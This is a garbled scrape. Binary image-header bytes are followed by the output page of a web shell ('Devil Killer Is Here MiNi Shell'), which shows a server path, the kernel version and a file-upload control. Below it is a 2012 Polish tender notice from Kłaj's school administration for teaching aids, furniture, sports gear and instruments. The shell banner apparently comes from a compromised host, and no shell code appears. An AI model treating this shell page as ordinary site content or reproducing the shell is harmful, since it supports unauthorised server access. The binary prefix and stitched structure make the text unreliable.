JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120730/275626-N-2012.html

<p class="kh_header"><b>Kłaj: Dostawa specjalistycznych pomocy dydaktycznych do prowadzenia zajęć 
edukacyjnych w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w kontekście wdrażania nowej podstawy kształcenia ogólnego</b><br>
<b>Numer ogłoszenia: 275626 - 2012; data zamieszczenia: 30.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Ekonomiczno-Administracyjny Szkół w Kłaju , Kłaj 652, 32-015 Kłaj, woj. małopolskie, tel. 12 284 16 11, faks 12 284 16 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.klaj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa specjalistycznych pomocy dydaktycznych do prowadzenia zajęć 
edukacyjnych w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w kontekście wdrażania nowej podstawy kształcenia ogólnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa specjalistycznych pomocy dydaktycznych do zajęć edukacyjnych zgodnie z zestawieniem:
Część 1  Oprogramowanie 
Oznaczenie przedmiotu zamówienia wg CPV  48190000-6
Oprogramowanie multimedialne do diagnozy i terapii dysleksji  szt.  5
Pakiet multimedialny wspomagający profilaktykę, diagnozę i terapię pedagogiczną dzieci ze szczególnym uwzględnieniem specyficznych problemów w nauce czytania i pisania. Zestaw przeznaczony dla nauczycieli przedszkoli i szkół powinien zawierać  aplikacje umożliwiające dokonanie oceny ryzyka dysleksji. Ponadto zestaw powinien być wyposażony w tradycyjne pomoce dydaktyczne uzupełniające: książeczki, obrazki, karty pracy, itp.
Oprogramowanie multimedialne do diagnozy i terapii dyskalkulii  szt. 5
Pakiet multimedialny wspomagający profilaktykę, diagnozę i terapię pedagogiczną dzieci ze szczególnym uwzględnieniem specyficznych problemów w nauce umiejętności matematycznych . Zestaw przeznaczony dla nauczycieli przedszkoli i szkół powinien zawierać  aplikacje umożliwiające dokonanie oceny ryzyka dyskalku-lii. Ponadto zestaw powinien być wyposażony w tradycyjne pomoce dydaktyczne uzupełniające: książeczki, obrazki, karty pracy, itp.
Oprogramowanie multimedialne do diagnozy i terapii logopedycznej  pakiet podstawowy  szt. 6
Zestaw powinien zawierać programy do diagnozy i terapii logopedycznej: szereg ciszący , szereg syczący, sze-reg szumiący, różnicowanie szeregów oraz aplikacja dla logopedy.
Program powinien być wyposażony w narzędzia pomocnicze: kalibrator dźwięków i profesjonalny mikrofon. Ponadto zestaw powinien zawierać tradycyjne pomoce dydaktyczne uzupełniające: płyty CD, książeczki, materiały graficzne do ćwiczeń, obrazki, karty pracy, itp.
Część 2   komputer przenośny (laptop)  szt. 2
Oznaczenie przedmiotu zamówienia wg CPV 30213100-6
Matryca 15,6 cala, typ ekranu LED, rozdzielczość 1366 x 768 pikseli, Minimalne wymagania techniczne-umożliwiające wykorzystanie oprogramowania multimedialnego: MS Windows XP Vista Windows 7, Internet Explorer 6.0 lub wyższy, procesor klasy Pentium IV 2,4 GHz oraz 512 MB RAM, karta sieciowa, karta dźwiękowa PCMCIA z wejściem liniowym, karta graficzna (minimalna rozdzielczość 800x600), port USB, mysz lub inne urządzenie wskazujące, napęd DVD-ROM, zainstalowany protokół  TCP/IP w systemie MS Windows.
Część 3 Wyposażenie pomieszczeń dydaktycznych/meble
Oznaczenie przedmiotu zamówienia wg CPV 39160000-1
Szafka na szuflady N 800  szt.  6
Szafka wykonana z płyty MDF  okleina bukowa, obrzeże pokryte taśmą PCV w dowolnym kolorze Wym.: 89 x 48 cm; wys. 89 cm, gł. półek 38 cm. Szafka podzielona jest pionowo na 3 części. W każdej części powinny mieścić się 3 szuflady duże i 2 małe  razem 15 szuflad.
Szafka na szuflady kombinowana1000 - szt.  5
Szafka wykonana z płyty MDF  okleina bukowa, obrzeże pokryte taśmą PCV w dowolnym kolorze Wym.: 105 x 50 cm; wys. 105 cm, gł. półek 38 cm. Szafka podzielona jest pionowo na 3 części. Środkowa część to regał z 5 otwartymi półkami. 
W każdej części bocznej  powinny mieścić się 4 szuflady duże i 2 małe  razem 12 szuflad.
Szafka na szuflady (wzór 7)  szt.  3
Szafka wykonana z płyty MDF  okleina bukowa, obrzeże pokryte taśmą PCV w dowolnym kolorze Wym.:105  x 54 cm; wys 203  cm, gł. półek 38 cm. Dół szafki podzielony jest pionowo na 3 części, z których środkowa jest otwartym regałem, a w każdej bocznej części mieści się 4 szuflady duże i 4 małe (razem 16 szuflad). Góra szafki to regał otwarty składający  się z 3 niedzielonych półek.
Szuflada duża  szt. 113
Szuflada wykonana po bokach z okleiny bukowej, front z płyty MDF z wyciętą łezką na dłoń, ułożona poziomo. Wym. szuflady: 27 x 36 x wys. 18 cm
Szuflada mała   szt.  62
Szuflada wykonana po bokach z okleiny bukowej, front  żółty MDF, górna krawędź górna krawędź posiada wycięcie w postaci falki. Wym. szuflady: 27 x 36 x wys. 9 cm.
Regał z 12 wnękami  szt. 2 
Regał w kolorze bukowym o wymiarach: wys. 118 x szer. 118 x gł. 39 cm. Posiada  12 półek ( 3 półki w 4 rzędach).
Regał z 6 wnękami  szt. 1 
Regał w kolorze bukowym o wymiarach: wys. 81 x szer. 81 x gł. 39 cm. Posiada  6 półek ( 3 półki w 2 rzędach).
Stół kwadratowy z dokrętkami prostymi  szt. 2 
Wymiary blatu 80  x  80 cm, kolor blatu dowolny; nogi dzięki specjalnym dokrętkom umożliwiają regulację wysokości do wzrostu dzieci.
Krzesełko mini  szt. 8 
Stelaż metalowy, oparcie i siedzenie ze sklejki w kolorze naturalnym z zaokrąglonymi narożnikami. Wysokość 38 cm.
Skrzynia skarbów  szt.  1
Skrzynia do przechowywania teatralnych rekwizytów. Skrzynia w kształcie kuferka, różne kolory. Wym.: dł. 100 cm x gł. 39 cm x szer. 50 cm.
Pojemniki do szafki  szt.  12
Plastikowe pojemniki w różnych kolorach i różnej wielkości
Kolumna drewniana narożna  szt.  1
Szafka narożna z trzema półkami w kolorze bukowym. Wym.: wys. 78 cm x szer. 43 cm x gł. 41 cm.
Część 4  Sprzęt  do zajęć sportowych i gimnastyki korekcyjnej
Oznaczenie przedmiotu zamówienia wg CPV 3740000-2
Piłka skacząca o średnicy 55 cm  szt.  8
Piłka do skakania z rączką w kształcie litery U. Średnica piłki 55 cm
Piłeczka masująca antystresowa  szt. 85
Miękka kolczasta piłeczka przeznaczona do zabawy, masażu ciała, ćwiczeń relaksacyjnych, zwłaszcza dłoni. Średnica 6,5 cm.
Wyspy kamienie  rzeczne  małe i duże wierzchołki  szt. 13 
6 kolorowych wysp o podstawie trójkąta służących do korygowania wad postawy i płaskostopia. W zestawie 3 duże wyspy w kształcie lekko zaokrąglonego trójkąta o dł. boku 38 cm oraz 3 małe wyspy w kształcie lekko zaokrąglonego trójkąta o dł. boku 26 cm, każda  wyspa z antypoślizgową podstawę.
Stożek rehabilitacyjny  szt. 6
Stożek do rozwijania koordynacji ruchowej. Wykonany z trwałego materiału odpornego na uszkodzenia.
Dotykowe dyski  kpl. 8 
W komplecie duże i małe dyski wykonane z miękkiego, elastycznego kauczuku. Każdy posiada inna fakturę. Te same faktury znajdują się na małych krążkach. W komplecie: 5 dużych dysków, 5 małych, woreczek i opaska na oczy.
Suchy basen kwadratowy   szt.  5
Suchy basen do piłek, powierzchnia 2,6m2,  dł. boku zewnętrznego 2m, wys. 60 cm, grubość ścianki 20 cm
Plastikowe piłki do basenu  kpl. 15
Zestaw 4000 piłek o średnicy 6 cm.
Worek dziwów  100 cm  szt. 6
Worek z rozciągliwej tkaniny zapinanej na rzepy, umożliwia poruszanie się, nie ogranicza dopływu powietrza i widoczności osobie znajdującej się wewnątrz. Służy do ćwiczeń ruchowych
Worek dziwów  120 cm  szt. 6
Worek z rozciągliwej tkaniny zapinanej na rzepy, umożliwia poruszanie się, nie ogranicza dopływu powietrza i widoczności osobie znajdującej się wewnątrz. Służy do ćwiczeń ruchowych
Łezka relaksacyjna  szt. 19
Miękka, wygodna łezka wykonana z kolorowej tkaniny i wypełniona granulatem. Wymiary ok. 100 cm  x  50 cm.
Rampa klin szt. 10 
Kształtka rehabilitacyjna w kształcie klina. Wykonana z pianki poliuretanowej, pokryta Kadenem. Wymiary: min. 99 x 49 x 49 cm. Występuje w komplecie z innymi elementami.
Schody szt. 10
Kształtka rehabilitacyjna w kształcie schodów. Wykonana z pianki poliuretanowej, pokryta Kadenem. Wymiary: min. 99 x 49 x 49 cm. Występuje w komplecie z innymi elementami
Wałek duży  szt. 10
Kształtka rehabilitacyjna w kształcie wałka. Wykonana z pianki poliuretanowej, pokryta skadenem. Wys. min. 115 cm, śr. min. 25 cm. Występuje w komplecie z innymi elementami 
Tunel mały do zabaw ruchowych, prosty  szt. 7 
Tunel prosty służący do gier i zabaw. Wymiary: dł. 150 cm, śr. Ok. 50 cm
Tunel duży do zabaw ruchowych, zygzak   szt. 8
Tunel służący do gier i zabaw w kształcie litery Z. Wymiary: dł. 280cm, śr. Ok. 50 cm
Spadochron 3,5 m (chusta)  szt. 4
Wykonany z materiału w różnych kolorach.
Worki do skakani  kpl. 9
W komplecie 6 kolorowych, wytrzymałych worków do ćwiczeń ruchowych.
Woreczki z groszkiem  kpl. 18
W komplecie 4 kolorowe woreczki wykonane z wytrzymałej bawełny.
Szarfy   kpl. 14
W komplecie 4 kolorowe szarfy o długości ok. 60 cm.
Platforma na kółkach z powłoką antypoślizgową  szt. 13
Platforma wykonana z płyty pokrytej antypoślizgową powłoką, kółka metalowe pokryte gumą, wymiary: ok. 40 cm  x  ok. 30 cm, wysokość ok. 7 cm
Pojazd czterokołowy  szt. 9
Urządzenie na kółkach do ćwiczeń ruchowych z poręczami. Wymiary  dł. ok. 40 cm, wys. ok. 60 cm, wymiar pedałów ok. 30 cm  x  10 cm.
GO-GO  szt. 14
Urządzenie na kółkach do ćwiczeń ruchowych, koordynacji i równowagi. Wymiary . ok. 50 cm  x. ok. 35 cm, wys. ok. 15 cm
Piłka-wałek do masażu  szt. 10
Miękka piłka o kształcie fasolki przeznaczona do zabaw ruchowych i odpoczynku w pozycji półleżącej.
Siatka wspinaczkowa   szt. 2
Siatka przeznaczona jest do ćwiczeń ruchowych, wysiłkowych, wspinaczki. Wykonana  z grubej, plecionej liny i mocowana na 6 metalowych zaczepach. 
Zestaw sportowy   szt. 5
Zestaw 114 akcesoriów sportowych do gier i zabaw. Akcesoria stanowią bazę do prowadzenia zajęć ruchowych, rehabilitacyjnych i gimnastyki korekcyjnej. W skład zestawu wchodzą:  29 rożnych elementów łączących to tworzenia torów przeszkód ( 8 rodzajów);  3 belki do równoważni;  12 pachołków w czterech kolorach;  8 zacisków czarnych;  6 drążków gimnastycznych czerwonych i zielonych;  20 kształtów w czterech kolorach do tworzenia torów przeszkód ( 5 rodzajów: małe kółko 9 cm, średnie kółko 57,5 cm, trójkąty, kwadraty 42 cm);  10 łapek w czterech kolorach do położenia na podłodze; 10 stopek w czterech kolorach do położenia na podłodze;  16 płaskich pasków do tworzenia wysokich przeszkód. 
Tor przeszkód olimpijski  szt. 7
Piankowe, geometryczne klocki o różnych wielkościach i kształtach, obszyte łatwo zmywalną tkaniną. Tor przeszkód można ustawiać w dowolny sposób. W skład zestawu wchodzi 14 elementów: 1sz,  materac 200 x 80 x 10 cm;  2 szt, tunel 50 x 50 x 40 cm; 1szt. schody 100 x 50 x 50 cm;  1 szt rampa 100 x 50 x 50 cm;  1 szt materac składany 180 x 60 x 5cm,  1szt; wałek duży;  4 szt. wałek mały,  3 szt. walec , 
Zestaw drabinkowy  szt. 2
Dzięki zastosowaniu systemu rozporowego zestaw jest bardzo łatwy w montażu i nie wymaga trwałego przy-twierdzenia do ściany. Można regulować wysokość drabinek (3 wysokości). Zestaw zawiera: drabinki, linę, trapez, kółka oraz elementy do mocowania. 
Ławeczka gimnastyczna rozmiar 1,  szt. 4
Drewniana ławka gimnastyczna o wym.: 30 cm x 2 m. Pod siedziskiem, na krótszym boku znajduje się specjal-ny zaczep umożliwiający mocowanie ławki do drabinki. Pod siedziskiem umieszczone są 3 podpórki (w tym 2  nogi), do których przymocowana jest deska wzmacniająca konstrukcję.
Domki z tunelami/aktywności  szt. 6 
3 tunele połączone na środku kołem. Na końcu pierwszego tunelu usytuowany domek, na końcu 2 tunelu znaj-duje się namiot. Pomoc dydaktyczna służąca do  czołgania się w tunelach, wchodzenia i wychodzenia oraz przeskakiwania. Produkt rozwija sprawność motoryczną u dzieci.
Narty dla dzieci na sznurku szt. 17
Narty letnie 1 para (2 narty) w jednolitym kolorze, dł. 104 cm i szer. 9  cm, białe sznurki służące do trzymania. Narty posiadają  na spodzie antypoślizgową gumę..
Ślimak - labirynt balansujący  szt. 9
Urządzenie do kształcenia zmysłu równowagi i koordynacji ruchowej. Kształt owalny o wymiarach ok. 50 cm  x  40 cm.
Kolista deska balansująca  szt. 10
Urządzenie do kształcenia zmysłu równowagi i koordynacji ruchowej. Kształt koła, średnica ok. 50 cm.
Galaretki  zestaw podstawowy   kpl.  6  (w komplecie 1 x niebieski i 1 x pomarańczowy)
Kolorowe krążki do ćwiczeń ruchowych. W komplecie 12 krążków o średnicy ok. 19 cm.
Zestaw kręgli  kpl.  9
W komplecie 9 plastikowych kręgli w 4 kolorach z 2 piłeczkami i stojakiem.
Część 5   Instrumenty muzyczne do zabawy
Oznaczenie przedmiotu zamówienia wg CPV 37521000-6
Agogo guiro   szt. 6
Drewniany instrument perkusyjny z pałeczką. Wydaje dźwięk podobny do tarki. Długość 25 cm. 
Marakasy (zestaw 2 szt.)   kpl. 8
Instrument muzyczny wykonany w całości z drewna o wysokości całkowitej min. 19 cm. Średnica części elip-tycznej - grzechoczącej - powinna wynosić min. 5 cm i mieć wysokość min. 8,5 cm. Instrument nie powinien mieć widocznych łączeń. Drewniana rączka powinna mieć wysokość m.in. 11 cm  i być pomalowana bezbarw-nym, nietoksycznym lakierem ekologicznym, natomiast górna część grzechocząca farbą w min. dwóch kolorach i wypełniona kulkami. Komplet powinien zawierać 2 sztuki w tych samych kolorach. 
Dzwoniący patyczek  kpl. 5
Instrument muzyczny wykonany z drewna oraz metalu, o wysokości min. 21 cm.  Drewniana rączka pomalowana jest farbą na min. 2 kolory. Przedłużeniem rączki jest prostopadłościan do którego jest przymocowanych 12 srebrnych, metalowych, krytych dzwoneczków. Komplet powinien zawierać 2 sztuki. 
Tamburyn z membraną  szt. 8
Kolorowy tamburyn z membraną o śr. 15 cm wykonany z malowanego, lakierowanego drewna. 4 pary metalo-wych talerzyków, dziurka na palec.
Terkotka (zestaw 2 szt.)   kpl. 5
Instrument muzyczny o wymiarach min. 12 cm szerokości i min. 12,5 cm wysokości, wykonany w całości z drewna i pomalowany kolorowymi farbami ekologicznymi w min. 2 kolorach. Obrotowa rączka o długości min. 9,5 cm zakończona  drewniana zębatką o średnicy min. 2,5 cm, która zahacza o cienki, drewniany, elastyczny pasek. Instrument wydaje dźwięk - terkanie - przy przekręcaniu obrotowej rączki. Komplet powinien zawierać 2 sztuki w różnych kolorach.
Trójkąt na drewnianym stojaku (24,5 x 21 cm)   szt. 6
W komplecie drewniany stojak, pałeczka oraz metalowy trójkąt. 
Muzyczne kukiełki (zestaw 6 szt.)  kpl. 8
Instrumenty muzyczne wykonane z drewna oraz metalu. Wysokość min. 21 cm. Do drewnianej rączki o wyso-kości min. 17 cm przymocowane są za pomocą 2 wystających, metalowych nitów podwójne metalowe talerzy-ki-czynele o średnicy min. 3,5 cm.  Drewniana rączka powinna być pomalowana farbą ekologiczną, nietoksyczną   i zakończona drewnianą główką postaci - dziewczynki lub chłopca. Główka postaci powinna być zakończona drewnianą czapeczką lub koroną , mieć warkoczyki z koralików lub kucyk z drewnianych koralików. Nad drugim talerzykiem kukiełka powinna mieć rączki, po obu stronach drewnianej rączki instrumentu, wykonane z cienkiego, kolorowego sznurka zakończonego drewnianym koralikiem. Komplet powinien zawierać 6 sztuk różnych kukiełek, każda powinna być zapakowana oddzielnie w woreczek foliowy.
Kolorowy flet   szt. 6
Drewniany, malowany flet do nauki gry. Wysokość ok. 33 cm.
Dzwonki na rękę lub nogę. szt. 8
4 dzwoneczki na pasku z rzepami. Długość ok. 20 cm
Dzwonki z rączką 3  szt. 10
3 dzwoneczki na rączce
Zestaw instrumentów  torba muzyczna - kpl. 16
W  zestawie: torblok, dzwonki, kastaniety, bębenek,  trójkąty, para marakasów, talerze, itp.. Wszystko zapako-wane w praktyczną torbę.
Zestaw płyt CD z muzyką relaksacyjną   szt. 5
Płyty powinny zawierać muzykę przeznaczoną do zajęć muzykoterapii i relaksacji (różne motywy).
Część 6   Inne pomoce  dydaktyczne: publikacje, gry, zabawki 
Oznaczenie przedmiotu zamówienia wg CPV 39162100-6; 37500000-3
W trosce o udany start. Poradnik dla nauczycieli i rodziców  szt. 8
Czytamy sylabami szt. 11
Wyrazy i obrazki do czytania całościowego   szt. 11
Nasza klasa. Wyrazy  do czytania całościowego   szt. 11
Opowieści sowy, cz. 1-2. Odmienna metoda nauki czytania  kpl. 9
Gry czytelnicze. Nazywanie świata, cz. 1-2  kpl. 9
Gra w kolory. Chcemy dobrze czytać i pisać, cz. 1-3  kpl. 7
Gra w kolory. Karty pracy, cz. 1-2  kpl. 7
Zestaw kontrolny PUS    szt. 16
PUS Idę do szkoły, cz.1-4  kpl. 10
PUS Rusz głową, cz.1-2  kpl. 11
PUS Skoncentruj się, cz.1-2   kpl. 11
PUS Przymiotnik, cz.1. Jaki? Jaka? Jakie?  szt. 11
PUS Rzeczownik, cz.1-2  kpl. 11
PUS Czasownik. Co robi? Co robią?, cz.1  szt. 11
PUS Łatwe ćwiczenia do nauki czytania, cz.1-4  kpl. 11
PUS ABC. Rozpoznawanie i rozróżnianie liter, cz.1-2   kpl. 10
PUS ABC. Dwuznaki, cz.3  szt. 10
PUS Gramatyka na wesoło, cz.1-2  kpl. 10
PUS Matematyka na wesoło, cz.1-4   kpl. 9 
Logico Piccolo-rtografia    kpl.  7
Logico Piccolo-czytanki  kpl. 7
Gry interaktywne Na ratunek planecie, cz. 1-2   kpl. 6
Logiczne układanie - gra logiczna    szt. 5
Mistrz logiki - gra logiczna    szt.1. 5
Plansze edukacyjne: rytmy przyrody, ekosystemy  szt. 6
Zestawy do eksperymentów naukowych: wulkan, układ słoneczny, wykopaliska   kpl. 12
Tuba Gąsienice   szt. 7
Tuba Pieksi  szt. 7
Mozaika z młotkiem  szt. 9
Mozaika Maxi 1   szt. 9
Mozaika XXL   szt.  6
Studnia Jakuba  szt.  8
Skaczące kapturki/czapeczki  szt. 7
Ścianki Zegar i Tetris,zestaw  szt. 6
Ścianka lustro tablica magnetyczna, zestaw szt. 7
Spiralny labirynt  szt. 7
Przeplatanka ze wzorami  szt.  10
8 kształtów - przeplatanki  szt. 8
Klocki łączki w kuferku  szt. 7
Szablony do rysowania i  malowania (owady, zwierzęta leśne, zwierzęta Afryki, itp.)  kpl. 11
Zestaw materiałów plastycznych  kpl. 14
(w skład kompletu wchodzą: brązowa glina rzeźbiarska, blok techniczny kolorowy, papier samoprzylepny, papier transparentny, gruby papier rysunkowy, flizelina, filc, klej z dozownikiem, tektura falista brązowa, tektura falista karbowana, sizal (5kolorów), papier do składania okrągły, papier do składania)
Komplet karbownic do papieru (kratka, kółka, paski)  kpl. 6
Komplet dziurkaczy CP1 (8 szt.)  kpl. 6
Komplet dziurkaczy CP2 (3 szt.)  kpl. 6
Komplet wytłaczanek (cukierek, kaczuszka, ślimak, dziewczynka, kokardka)   kpl. 6
Narzędzia do modelowania (w komplecie pazurki i wałki)  kpl. 6
Farby plakatowe BASIC COLOR  kpl. 6
(w komplecie 9 kolorów: ciemnożółta, pomarańczowa, ciemnoczerwona, jasnoniebieska, jasnozielona, ciemnobrązowa, czarna, biała, różowa)
 Ładnie mówię głoski, cz. 1-5  kpl. 6
Logopedia. Będę mówić poprawnie, cz. 1-4   kpl. 7
Skacząca piłeczka  szt.  12
Dmuchajka  szt.  12
Zestaw kart  połówki (w komplecie: zabawki, zwierzęta, warzywa, środki transportu)  kpl. 9
Dźwięki  zwierzęta, cz. I-III   kpl. 1
Magnetyczne historyjki (plansze magnetyczne służące do układania historyjek obrazkowych)  szt. 10
Domino logopedyczne (w komplecie 6 części)   kpl. 10
Loteryjka dźwiękowo-obrazkowa  szt. 9
Lotto dźwiękowe. Sytuacje.    szt. 6
Teatrzyk wielofunkcyjny  szt. 6
Zestaw pacynek -  kpl.  12  (w każdym komplecie 4 różne pacynki)
Laboratorium naukowe 18 zadań  szt. 7 
Zestaw do eksperymentów (7 eksperymentów)  szt. 7 
Mikroskop   zestaw duży   szt. 7 
Waga   szt. 7 
Komplet anatomia człowieka w komplecie 4 zestawy: mózg, kościec, czaszka, mięśnie)  kpl. 7 
Zestaw pomocy do nauczania matematyki (tablice, układanki klocki, puzzle, karty, cyfry, figury, domino, kształtki, mozaiki, itp.)  w komplecie 10 różnych zestawów   kpl. 8 
Globus fizyczny, śr. 220 cm. wys. 30 cm  szt. 9
Globus polityczny, śr. 220 cm. wys. 30 cm   szt. 9
Komplet  kolorowych piórek (w komplecie 2 różne zestawy)  kpl. 4
Loteria 1,2,3   szt. 7
Bystre oczko   szt. 9
Łamigłówka logopedyczna Junior 2 w 1   szt. 8.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.52.10.00-6, 37.40.00.00-2, 48.19.00.00-6, 30.21.31.00-6, 39.16.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie obowiązuje</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
